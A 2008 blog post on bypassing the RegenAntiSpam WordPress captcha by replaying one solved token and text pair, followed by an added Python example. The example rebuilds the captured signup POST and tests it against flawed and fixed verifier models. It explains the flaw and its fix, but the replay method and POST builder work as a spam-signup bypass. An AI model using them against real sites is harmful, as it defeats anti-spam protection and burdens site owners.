Captcha Breaking can be so easy


Written on 18. November 2008 – 21:13 | by admin

Really, why bother with difficult methods like OCR with neural networks when it can all be so easy? Of course there are (well, kind of) *secure* captcha implementations, but let's face the facts: most of the current captcha systems have basic design flaws that let us bypass the captcha test altogether, or just decode the requested result by reversing the captcha generation algorithm, as was done with the pligg captcha. This is not as hard as it may sound if you look at the source of, for example, RegenAntiSpam, which we use as the example here: it has a really basic design flaw that lets us re-use a solved captcha over and over again, even on random websites. The RegenAntiSpam captcha is generated from a token that is supplied by the website, and that token is sent along with the solved captcha text in the POST request to the signup form.

Let's have a look at the captcha URL:

http://blog.tld/wp-content/plugins/captcha.php/?token=jo26gz

So here we have the token that is used to identify the captcha. Now all you have to do is solve one captcha and save the token as well as the result text. Then sniff the HTTP POST request so you can build your own submission script and just add the token and the solved text as static values. Yes, believe it or not, it will work. It's really that simple.

For WordPress this would look like:

stage=validate-user-signup&user_name=fsddsf&user_email=fdsfds%40fsdfds.com&spamCode=fb9f7c&mcode=jo26gz&signup_for=blog&chkread=&submit=Next+%C2%BB

Obviously spamCode (the solved text) and mcode (the token) are used as static values in each request. Nothing on the server side apparently marks a token as used or binds it to the site and session that requested it, which is why the same pair keeps validating. The fix is the usual one: store the expected answer server-side under a random token, tie it to the session, and delete it on the first verification attempt, right or wrong. This is just one example of a basic design flaw in a certain captcha implementation. I'm sure you can spot more out there ;)
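To make the replay concrete, here is an added example (my code, not the blog's and not RegenAntiSpam's): it rebuilds the sniffed signup POST with the captcha fields as static values, then runs that body against two small models of a verifier. The two classes are an assumption about the design, not the plugin's source: the flawed one derives the expected text from the token alone, so any solved pair stays valid forever and on every site running the same code; the fixed one keeps per-token, per-session, single-use state. Token and text values are the ones captured above; the verifier logic and the session ids are constructed for the example.

```python
"""Replaying a solved captcha, and the server-side check that allows or blocks it.

Added example, not the blog's or RegenAntiSpam's code.  The two verifier classes
are a simplified model (an assumption about the design, not the plugin's source).
"""
import hashlib
import hmac
import secrets
from urllib.parse import parse_qs, urlencode

# Token and solved text taken from the captured POST body in the post.
SOLVED_TOKEN = "jo26gz"
SOLVED_TEXT = "fb9f7c"


def build_signup_body(user_name, user_email, token=SOLVED_TOKEN, solved=SOLVED_TEXT):
    """Rebuild the sniffed WordPress signup POST, with both captcha fields static."""
    fields = [
        ("stage", "validate-user-signup"),
        ("user_name", user_name),
        ("user_email", user_email),
        ("spamCode", solved),  # text read off the captcha image, solved once by hand
        ("mcode", token),      # token that named that image in the captcha.php URL
        ("signup_for", "blog"),
        ("chkread", ""),
        ("submit", "Next \u00bb"),
    ]
    return urlencode(fields)


def _captcha_fields(body):
    form = parse_qs(body)
    return form.get("mcode", [""])[0], form.get("spamCode", [""])[0]


def _same(a, b):
    # Constant-time compare that also copes with non-ASCII user input.
    return hmac.compare_digest(a.encode(), b.encode())


class StatelessVerifier:
    """Model of the flawed design: nothing is stored per captcha, the expected text
    is a pure function of the token.  A pair that was valid once is valid forever,
    on every site running the same code (the 'random websites' case in the post)."""

    @staticmethod
    def expected_text(token):
        return hashlib.sha256(token.encode()).hexdigest()[:6]

    def check(self, body):
        token, text = _captcha_fields(body)
        return _same(text, self.expected_text(token))


class SingleUseVerifier:
    """Fixed design: the token is an opaque handle into server-side state holding the
    expected text and the session it was issued to, consumed on the first check."""

    def __init__(self):
        self._pending = {}  # token -> (expected text, session id)

    def issue(self, session_id):
        token = secrets.token_urlsafe(6)
        text = secrets.token_hex(3)  # would be rendered into the image, never sent as text
        self._pending[token] = (text, session_id)
        return token, text

    def check(self, body, session_id):
        token, text = _captcha_fields(body)
        entry = self._pending.pop(token, None)  # consumed whether the answer is right or not
        if entry is None:
            return False
        expected, owner = entry
        return owner == session_id and _same(text, expected)


def replay_demo():
    """Solve once, then replay the same token/text pair against both designs."""
    results = {}

    flawed = StatelessVerifier()
    text = flawed.expected_text(SOLVED_TOKEN)  # stands in for reading the image once
    replay = build_signup_body("fsddsf", "fdsfds@fsdfds.com", SOLVED_TOKEN, text)
    results["flawed_first"] = flawed.check(replay)
    results["flawed_replay"] = flawed.check(replay)
    results["flawed_other_site"] = StatelessVerifier().check(replay)

    fixed = SingleUseVerifier()
    token, text = fixed.issue(session_id="sess-A")
    replay = build_signup_body("fsddsf", "fdsfds@fsdfds.com", token, text)
    results["fixed_first"] = fixed.check(replay, "sess-A")
    results["fixed_replay"] = fixed.check(replay, "sess-A")
    token, text = fixed.issue(session_id="sess-A")
    replay = build_signup_body("fsddsf", "fdsfds@fsdfds.com", token, text)
    results["fixed_other_session"] = fixed.check(replay, "sess-B")
    return results


if __name__ == "__main__":
    for name, ok in replay_demo().items():
        print(f"{name:20s} {'accepted' if ok else 'rejected'}")
```

Running it shows the three replays against the stateless model all accepted, and only the first, same-session check against the single-use model accepted; the body built with the defaults is byte-for-byte the captured POST above, so the same script with a real HTTP client is the "submission script" the post describes.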
